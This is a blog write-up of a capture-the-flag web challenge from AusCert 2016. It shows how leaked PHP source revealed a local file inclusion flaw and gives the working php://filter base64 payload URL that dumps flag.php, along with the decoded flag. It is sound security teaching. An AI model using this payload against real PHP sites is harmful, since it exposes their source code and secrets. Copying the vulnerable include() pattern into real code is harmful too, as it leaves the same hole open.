Shearwater AusCert 2016 CTF - So you think you can LFI? Writeup
A solution guide for the So you think you can LFI? challenge released during the AusCert 2016 CTF
This blog contains a write up of the solution I used to solve the challenge “So you think you can LFI” from the web category. We are given a generic link to the web application server and are told all the web challenges can be found throughout the web application. We are also told the name of the challenge may help lead you to the vulnerability as well.
The link to the web server:
Doing some general enumeration of the web application, the robots.txt file was located.
User-agent: *
Disallow: /backup/
The robots.txt file pointed to a directory called backup, which is where index.txt was found. This file leaked the entire source code of the web application’s index.php page. The below code snippet stood out very quickly as a Local File Include vulnerability, hence the name of the challenge.
<?php if (isset($_GET['filename'])){ $inputfile = str_replace('..', '', addslashes($_GET['filename'])); if (strpos($inputfile, 'flag') !== false){ $error = include($inputfile); echo $error; } }else{ include_once 'footer.php'; } ?>
In the above code, the web application will take the value of the “filename” parameter, supplied by a GET request to the index.php page. The value is interpreted as a file, then the web application attempts to load the value as part of the web page. However there is some sanitisation and filtering being performed on the value before the include() function. From the above snippet, it is known that the “filename” parameter is required, the word “flag” must be included in the input. With quite a bit of trial and error, it was identified that the index.php’s response would contain a “1” when the below URL is used.
https://web.ctf.shearwater.com.au/?filename=./flag/flag.php
The “flag.php” file and directory were discovered because the below URL would return a blank page instead of the web application’s generic error page.
https://web.ctf.shearwater.com.au/flag/flag.php
Because the flag file is assumed to contain PHP code, which will be executed on the server before the page is returned to the viewer. This means we need to find a way to stop the server from processing the flag.php file, so the contents could be viewed. This is when I came across PHP wrappers, specifically the filter wrapper which can be used to base64 encode an entire file.
https://web.ctf.shearwater.com.au/index.php?filename=php://filter/convert.base64-encode/resource=./flag/flag.php
This resulted in the following base64 encoded string being included in the index.php’s response.
PD9waHAKJGZsYWcgPSAnZmxhZ3tQaHBfV3JhcHAzcnNfUl92M3J5X3VzM2Z1bH0nCj8+1
Which when decoded gave the flag for the challenge.
% echo PD9waHAKJGZsYWcgPSAnZmxhZ3tQaHBfV3JhcHAzcnNfUl92M3J5X3VzM2Z1bH0nCj8+1 | base64 --decode
<?php
$flag = 'flag{Php_Wrapp3rs_R_v3ry_us3ful}'
?>
Challenge completed, a nice 200pt web challenge.
